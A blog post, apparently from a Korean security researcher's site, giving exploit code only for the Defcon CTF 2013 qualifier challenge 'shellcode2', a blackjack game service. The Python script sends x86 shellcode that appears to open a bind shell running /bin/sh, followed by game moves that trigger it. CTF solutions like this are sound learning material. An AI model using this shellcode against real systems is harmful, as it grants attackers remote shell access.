Defcon CTF 2013 Qual - shellcode2 (Exploit only)

2013. 7. 7. 19:07·CTF/2013

Category : Pwnable (\xff\xe4\xcc)


blackjack

 

Summary : generate shellcode with game


Exploit

#!/usr/bin/env python


import socket

import time

import thread

import re



HOST = "blackjack.shallweplayaga.me"

PORT = 6789


SHELLCODE = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

def receiver(s):

while(1):

try:

data = s.recv(1024)

except:

exit()

print data

time.sleep(0.1)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))

thread.start_new_thread(receiver,(s,))

time.sleep(0.5)

s.send("\x90\x0c\x90\x0c"+SHELLCODE+"\n")

s.send("65\nS\n21\nH\n1\nH\nS\n20\nS\n12\nH\nS\n1\nS\n85\nS\n85\nS\n85\nH\nS\n1\nS\n85\nS\n85\nS\n85\nS\n85\nH\nS\n1\nS\n1\nS\n85\nS\n1\nS\n85\nS\n1\nS\n85\nS\n1\nS\n85\nS\n85\nS\n85\nS\n125\nS\n60\nS\n32\nS\n1\nS\n28\nS\n1\nS\n85\nS\n85\nH\nS\n35\nH\nS\n1\nS\n23\nS\n18\nS\n-1\n")

time.sleep(0.5)

s.close()



저작자표시 (새창열림)

'CTF > 2013' 카테고리의 다른 글

Defcon CTF 2013 Qual - shellcode4 (Exploit only)  (0) 2013.07.07
Defcon CTF 2013 Qual - shellcode3 (Exploit only)  (0) 2013.07.07
Defcon CTF 2013 Qual - pwnable3 (Exploit only)  (0) 2013.07.07
Plaid CTF 2013 Write up collection  (0) 2013.04.23
Plaid CTF 2013 - pork (Exploit only)  (0) 2013.04.22
'CTF/2013' 카테고리의 다른 글
  • Defcon CTF 2013 Qual - shellcode4 (Exploit only)
  • Defcon CTF 2013 Qual - shellcode3 (Exploit only)
  • Defcon CTF 2013 Qual - pwnable3 (Exploit only)
  • Plaid CTF 2013 Write up collection
pwn3r_45
pwn3r_45
  • pwn3r_45
    pwn3r_45
    pwn3r_45
  • 전체
    오늘
    어제
    • View All (155)
      • Paper (0)
        • Power Grid (0)
        • Software_Kernel (0)
        • Exploitation (0)
        • RTOS (0)
        • UAV (0)
        • SCADA (0)
      • Articles (0)
      • Personal (18)
      • Technical Note (9)
        • Hardware (1)
        • Vulnerability Research (8)
        • Binary Exploitation (5)
        • PR23 (0)
        • Vulnerability (1)
        • Linux Kernel (1)
        • 현대암호 (0)
      • CTF (90)
        • 2025 (0)
        • 2024 (1)
        • 2023 (5)
        • 2019 (5)
        • 2018 (20)
        • 2017 (7)
        • 2016 (6)
        • 2015 (1)
        • 2014 (3)
        • 2013 (14)
        • 2012 (6)
      • Wargame (22)
        • FTZ (13)
        • Lord Of Bof - Redhat 6.2 (0)
        • IO.smashthestack.org (5)
        • Amateria.smashthestack.org (0)
        • pwnable.tw (0)
        • Vortex.overthewire.org (3)
        • Webhacking.kr (0)
        • reversing.kr (0)
        • dreamhack.io (0)
        • CodeEngn (1)
      • Reverse engineering (1)
      • Issue (13)
        • Conference_CTF info (13)
      • Coding (0)
        • C# (0)
      • ETC (2)
      • 미완성 (0)
  • 블로그 메뉴

    • Home
    • Tag
    • MediaLog
    • LocationLog
    • Guestbook
    • Admin
    • Write
  • 링크

    • 6l4ck3y3
    • idkwim
    • gogil
    • dakuo
    • badcob
    • 임준오씨 블로그
    • 김용진씨 블로그
    • david942j
    • orange tsai
    • pwndiary
    • theori
    • tacxingxing
    • jinmo123's team blog
    • ConS-tanT
    • jaybosamiya
    • procdiaru
  • 공지사항

  • 인기 글

  • 태그

    power of community
    csaw ctf
    HUST
    csaw
    HUST2011
    후기
    web
    pwnables
    정보보호올림피아드
    POC
    gnuboard
    vuln
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
pwn3r_45
Defcon CTF 2013 Qual - shellcode2 (Exploit only)
상단으로

티스토리툴바